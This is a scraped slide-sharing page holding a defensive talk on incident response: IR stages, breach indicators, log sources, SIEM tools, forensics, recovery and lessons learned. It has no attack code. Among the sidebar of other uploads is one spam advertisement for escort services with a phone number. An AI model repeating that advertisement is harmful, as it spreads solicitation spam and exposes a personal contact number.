Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraDeakin University
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 

Recently uploaded (20)

DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 

Incident response before:after breach

  • 1. Incident Response Operation Before/After Hacked Sumedt Jitpukdebodin Senior Security Researcher @ I-SECURE Co. Ltd. LPIC-1, NCLA, C|EHv6, eCPPT, eWPT, CompTIA Security+, IWSS, CPTE
  • 2. # whoami • Name: Sumedt Jitpukdebodin • Jobs: Security Consultant, Senior Security Researcher @ I- SECURE • Website: www.r00tsec.com, www.techsuii.com • Admin: @2600thailand, @OWASPThailand • Book: Network Security Book • Hobby: Writing, Hacking, Researching, Gaming, etc. • My article: please search google with my name.
  • 6. # id • Hack is easy, defend is so f*cking hard. • Surfaces • 0day • Social Engineering • Etc.
  • 9. Definition • Event - Activity that we monitor (Log) • Incident - the damage event. • Incident Response(IR) - Actions taken subsequent to an incident to understand the incident and take remedial action
  • 10. Top Priority for IR. • Identify the problems • Fix the problems. • Recovery system back to normal.
  • 11. Step of IR. Source:: http://www.emrisk.com/sites/default/files/images/newsletters/Incident%20Response%20Cycle.png
  • 12. Step of IR. • Preparation • Skill, Procedure , Log, Tools, Forms, Policies, Checklists, etc. • Detection(Identification) & Analysis • From Best Practise, Researching and Lesson Learned • Containment • Eradication • Remediation • Post-Incident Activities(Lesson Learned) • What are they doing • Where are they doing • What backdoor have they left • Develop Attack Signatures.
  • 13. Step of IR. • Preparation • Skill, Procedure , Log, Tools, Forms, Policies, Checklists, etc. • Detection(Identification) & Analysis • From Best Practise, Researching and Lesson Learned • Containment • Eradication • Remediation • Post-Incident Activities(Lesson Learned) • What are they doing • Where are they doing • What backdoor have they left • Develop Attack Signatures.
  • 14. Step of IR. • Preparation • Skill, Procedure , Log, Tools, Forms, Policies, Checklists, etc. • Detection(Identification) & Analysis • From Best Practise, Researching and Lesson Learned • Containment • Eradication • Remediation • Post-Incident Activities(Lesson Learned) • What are they doing • Where are they doing • What backdoor have they left • Develop Attack Signatures.
  • 15. Step of IR. • Preparation • Skill, Procedure , Log, Tools, Forms, Policies, Checklists, etc. • Detection(Identification) & Analysis • From Best Practise, Researching and Lesson Learned • Containment • Eradication • Remediation • Post-Incident Activities(Lesson Learned) • What are they doing • Where are they doing • What backdoor have they left • Develop Attack Signatures.
  • 16. Step of IR. • Preparation • Skill, Procedure , Log, Tools, Forms, Policies, Checklists, etc. • Detection(Identification) & Analysis • From Best Practise, Researching and Lesson Learned • Containment • Eradication • Remediation • Post-Incident Activities(Lesson Learned) • What are they doing • Where are they doing • What backdoor have they left • Develop Attack Signatures.
  • 17. Step of IR. • Preparation • Skill, Procedure , Log, Tools, Forms, Policies, Checklists, etc. • Detection(Identification) & Analysis • From Best Practise, Researching and Lesson Learned • Containment • Eradication • Remediation • Post-Incident Activities(Lesson Learned) • What are they doing • Where are they doing • What backdoor have they left • Develop Attack Signatures.
  • 18. What to look for • Look for abnormalities • Performance issues, off peak activity • Redirect some client. • Example Indicators • new accounts, new directories, new file in website, file system changes, crashes, unusual system usage patterns • Example Sources • Access Log, IDS, IPS, Firewall, System Log, Suspicious Traffic • Potential Issue • File/ Folder Encryption • BIOS Password Protection • Whole Disk Encryption/ Risk
  • 19. What to look for • Look for abnormalities • Performance issues, off peak activity • Redirect some client. • Example Indicators • new accounts, new directories, new file in website, file system changes, crashes, unusual system usage patterns • Example Sources • Access Log, IDS, IPS, Firewall, System Log, Suspicious Traffic • Potential Issue • File/ Folder Encryption • BIOS Password Protection • Whole Disk Encryption/ Risk
  • 20. What to look for • Look for abnormalities • Performance issues, off peak activity • Redirect some client. • Example Indicators • new accounts, new directories, new file in website, file system changes, crashes, unusual system usage patterns • Example Sources • Access Log, IDS, IPS, Firewall, System Log, Suspicious Traffic • Potential Issue • File/ Folder Encryption • BIOS Password Protection • Whole Disk Encryption/ Risk
  • 21. What to look for • Look for abnormalities • Performance issues, off peak activity • Redirect some client. • Example Indicators • new accounts, new directories, new file in website, file system changes, crashes, unusual system usage patterns • Example Sources • Access Log, IDS, IPS, Firewall, System Log, Suspicious Traffic • Potential Issue • File/ Folder Encryption • BIOS Password Protection • Whole Disk Encryption/ Risk
  • 23. Centralized Log Diagram Source:: http://www.sysadmin.in.th/course/LogFiles/Centralized_Logs_Server_by_SysAdmin.jpg
  • 24. # whereis logs • Device Log • Server Log • Application Log
  • 25. # ls /var/log/ • web_server/{access.log,error.log} • audit/audit.log • syslog • openvpn.log
  • 28. Devices • Firewall • IDS/IPS • Next Generation Firewall • Mail Gateway • Etc.
  • 29. Centralized Log • Syslog-ng(rsyslog) • Splunk • Graylog2 • logstrash • Scribe
  • 31. SIEM(“Security Information and Event Management") • Arcsight • Log Correlation Engine By Tenable • Splunk • OSSIM ** • Alienvault ** • LOGalyze ** • Etc.
  • 32. Log Correlation Engine By Tenable Source:: http://www.tenable.com/blog/log-correlation-engine-36-now-with-its-own-gui
  • 36. SQL Injection Case • Alert: SQL Injection • Attacker: China • Log From: Web Application Firewall
  • 40. Forensic • Containment • Ensure that the system(s) and network are protected from further risk. • Isolate the compromised system(s) • Eradication • How they got in • Where they went • What they did • The removal of malware • Patching Vulnerability • Identifying vulnerability • Improve network and system countermeasures
  • 41. Forensic • Containment • Ensure that the system(s) and network are protected from further risk. • Isolate the compromised system(s) • Eradication • How they got in • Where they went • What they did • The removal of malware • Patching Vulnerability • Identifying vulnerability • Improve network and system countermeasures
  • 42. Recovery(Restore/Rebuild) • Restore status of service to normal • System owners decide based on advice from incident handling team - Business Decision. • Monitor the service after recovery • Performance • Anomalies
  • 43. Lesson Learned • Detail of incident report • Communicate to others on the team • Apply fixes in environment • Conduct a performance analysis of the overall incident and improve operations • “Not!!!!” Blaming people • Review/Rewrite Policy • Determines cost of incident • Apply lesson learned to the entire entity • Budget for, install, and maintain protection software